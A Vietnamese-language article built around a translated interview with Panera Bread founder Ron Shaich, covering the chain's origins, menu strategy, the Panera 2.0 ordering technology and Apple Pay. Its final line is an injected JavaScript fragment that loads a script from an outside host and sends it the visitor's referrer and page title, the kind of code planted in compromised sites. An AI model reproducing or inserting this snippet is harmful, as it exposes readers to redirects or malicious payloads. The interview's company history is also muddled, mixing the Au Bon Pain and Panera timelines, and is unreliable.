Panera Bread là chuỗi cửa hàng phục vụ nhanh các loại bánh mì, mì ống và cà phê ở Mỹ và Canada. Trụ sở chính của hãng đặt tại Richmond Heights, Missouri. Tính đến thời điểm hiện tại, Panera Bread có đến hơn 2000 cửa hàng tại 40 bang ở Mỹ, xếp hạng thứ 37 trong “Top những Công ty tăng trưởng nhanh nhất 2014”.
Hôm nay, Ron Shaich là người sáng lập và CEO của Panera Bread, trong đó có gần 2.000 địa điểm ở Mỹ và Canada, 80.000 nhân viên và mức vốn hóa thị trường 4,5 tỷ USD.
Dưới đây là cuộc phỏng vấn khái quát toàn bộ tình hình thời điểm hiện tại của Panera Bread:
Business Insider: Làm thế nào mà Panera có được sự khởi đầu thành công?
Ron Shaich: Tôi xác định rằng đây là những món tôi muốn ăn và tạo ra một cửa hàng bánh duy nhất trong trung tâm thành phố Boston vào năm 1980. Đến cuối những năm 80, tôi đã có 50.000 khách hàng, nhưng không có ai mua cookie trước buổi trưa cả. Vì vậy, tôi quyết định đưa các món bánh nướng Pháp ra tiệm, được gọi là Au Bon Pain.
Đến tháng 2 năm 1981, tôi mua lại 3 cửa hàng khác và tiếp nhận nợ của chúng sau đó sáp nhập chúng thành Panera như ngày hôm nay.
BI: Đâu là thời điểm đỉnh cao nhất của Panera?
RS: Đó là năm 1984. Tôi đã làm việc như một nhân viên trong các tiệm bánh. Mọi người đi vào và nói: “Tôi muốn chiếc baguette đó. Xắt nó từ trên xuống dưới”. Tôi làm và giao cho họ các ổ bánh. Họ lấy ra một túi thịt deli, một số pho mát và làm một chiếc bánh sandwich của riêng mình. Bạn không cần phải là một chuyên gia để nhận ra một cơ hội khổng lồ từ những chiếc bánh sandwich.
Trước kia, nền tảng chính của chúng tôi là súp, salad và bánh mì. Tuy nhiên, ngay sau đó, tôi đã xây dựng mô hình thức ăn nhanh. Tôi muốn Panera trở thành nơi bán những chiếc bánh sanwich chứ không đơn thuần là nơi cung cấp nguyên liệu cho nó. Thành công đến khá sớm khi chúng tôi có được 30% – 40% thị phần. Những khách hàng của chúng tôi không quan tâm đến số tiền họ bỏ ra. Họ chỉ quan tâm đến họ chuẩn bị được ăn gì và họ được phục vụ như thế nào.
BI: Chiến lược phát triển của bạn cho Panera là gì?
RS: Để duy trì và phát triển một nhà hàng ổn định trong một thời gian dài, bạn cần chú trọng đến cả những sản phẩm phụ. Cho dù Panera từ khi phát triển đã đạt được những lợi thế cạnh tranh lớn, tuy nhiên, tôi và cộng sự không bao giờ bỏ bê việc phát triển danh mục sản phẩm. Khách hàng luôn cần những điều mới. Bạn có thể thay đổi thực đơn theo thời gian bằng việc nhấc những món phục lên hạng mục món chính. Panera chuyên về những loại bánh mì nhưng không vì thế mà cửa hàng chúng tôi không thể bán được salad hay khoai tây chiên.
Bên cạnh đó, tôi cũng hướng nhân viên đến dịch vụ giao hàng cho khách hàng. Chúng tôi không cần tuyển những nhân viên to cao, lực lưỡng. Thứ chúng tôi cần là sự nhanh nhạy trong mọi tình huống.
Panera có 80.000 nhân viên và phục vụ 10 triệu người mỗi tuần. Tôi đã trở lại ở vị trí CEO và tôi có thể khẳng định Panera hiện đang có một nền tảng vững chắc. Chúng tôi sẽ tạo nên sự khác biệt lớn trong thế giới đồ ăn nhanh.
Chiến lược tốt là chiến lược liên tục được thay đổi. Nó khắc phục những nhược điểm còn tồn đọng, cải biên thêm những ưu thế mới.
BI: Ông có thể nói gì về sáng kiến Panera 2.0?
RS: Chúng tôi đã nghiên cứu nó được 4 năm. Nó tập hợp hàng loạt các công nghệ hỗ trợ việc thay đổi trải nghiệm của khách hàng. Nếu bạn đến Panera để ăn, bạn chỉ đơn giản là đi bộ vào bên trong, chọn cho mình một chỗ ngồi và sử dụng điện thoại để đặt hàng. Khi đó bạn sẽ gian tiếp đi vào hệ thống sản xuất của chúng tôi – là những căn bếp phía sau, và các thực phẩm sẽ phục vụ trực tiếp tại bàn của bạn.
Ngoài ra, nếu bạn muốn có trước một vị trí tại nhà hàng, bạn có thể đặt nó từ văn phòng của mình, từ một ki-ốt trong quán cà phê hay bất cứ nơi nào mà bạn thích – bạn chỉ cần đi bộ vào bên trong và đồ ăn đang chờ bạn tại quầy. Tất cả điều này đã được chúng tôi kiểm tra rất kỹ càng với 2.0.
Panera là một trong những nhà bán lẻ đầu tiên hợp tác với Apple cho việc thanh toán tại cửa hàng. Chúng tôi làm điều này vì lợi ích của khách hàng. Và khi bạn làm vì họ, họ sẽ đáp trả bạn bằng sự trung thanh – điều quan trọng nhất trong việc kinh doanh nhà hàng.
BI: Liệu khách hàng có thực sự quan tâm đến Panera 2.0?
RS: Những gì khách hàng muốn là có thêm niềm vui và những giá trị cuộc sống. Họ không hiểu hoặc không cần biết thứ gì hiện đại hơn hay công nghệ phát triển như thế nào. Việc đó là của Panera. “Apple Paid” giúp khách hàng thanh toán dễ dàng hơ ở mức độ bảo mật cao. Đơn giản là những gì khách hàng cần.
s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;